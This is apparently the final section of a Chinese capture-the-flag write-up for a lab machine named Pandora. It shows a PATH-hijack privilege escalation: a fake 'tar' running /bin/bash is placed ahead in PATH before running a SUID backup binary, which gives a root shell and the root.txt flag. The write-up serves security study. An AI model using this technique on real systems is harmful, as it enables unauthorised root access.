matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=/home/matt:$PATH
🦿剑已借到,没什么意外了
🦿运行/usr/bin/pandora_backup文件
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
🦿老铁666,没毛病
root@pandora:~# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)
🦿寻找曹贼(root.txt)
root@pandora:~# cd /
root@pandora:/# ls -la
total 68
drwxr-xr-x 18 root root 4096 Dec 7 14:32 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
lrwxrwxrwx 1 root root 7 Feb 1 2021 bin -> usr/bin
drwxr-xr-x 4 root root 4096 Jan 3 07:50 boot
drwxr-xr-x 2 root root 4096 Jun 11 2021 cdrom
drwxr-xr-x 19 root root 4000 Apr 10 12:41 dev
drwxr-xr-x 105 root root 4096 Jan 3 07:50 etc
drwxr-xr-x 4 root root 4096 Dec 7 14:32 home
lrwxrwxrwx 1 root root 7 Feb 1 2021 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 1 2021 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 1 2021 libx32 -> usr/libx32
drwx------ 2 root root 16384 Jun 11 2021 lost+found
drwxr-xr-x 2 root root 4096 Dec 7 14:32 media
drwxr-xr-x 2 root root 4096 Dec 7 14:32 mnt
dr-xr-xr-x 312 root root 0 Apr 10 12:41 proc
drwx------ 5 root root 4096 Jan 3 07:42 root
drwxr-xr-x 28 root root 820 Apr 11 09:58 run
lrwxrwxrwx 1 root root 8 Feb 1 2021 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Dec 7 14:32 srv
dr-xr-xr-x 13 root root 0 Apr 10 12:41 sys
drwxrwxrwt 13 root root 4096 Apr 11 09:39 tmp
drwxr-xr-x 15 root root 4096 Jun 11 2021 usr
drwxr-xr-x 14 root root 4096 Dec 7 14:32 var
root@pandora:/# cd root
root@pandora:/root# ls -la
total 36
drwx------ 5 root root 4096 Jan 3 07:42 .
drwxr-xr-x 18 root root 4096 Dec 7 14:32 ..
drwxr-xr-x 2 root root 4096 Dec 7 14:32 .backup
lrwxrwxrwx 1 root root 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Jan 3 07:42 .cache
-rw-r--r-- 1 root root 250 Apr 10 12:41 .host_check
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 Apr 10 12:41 root.txt
drwx------ 2 root root 4096 Dec 7 14:32 .ssh
root@pandora:/root# cat root.txt
fbcb4e84bff398e6ddfbb785cbf08899
📽剧 终
🚵♂️清理战场,班师回朝
🍀参考:
SNMP学习笔记之SNMPWALK 安装与使用详解
https://kam1.cc/2022/02/10/Pandora/
超详细SQLMap使用攻略及技巧分享
安全客 Sqlmap使用详解
https://mp.weixin.qq.com/s/NAdWhxqS1m3t8LZ9p-YImw
🎡
🍀 祭酒安全 🍀
一天是祭酒人 一辈子都是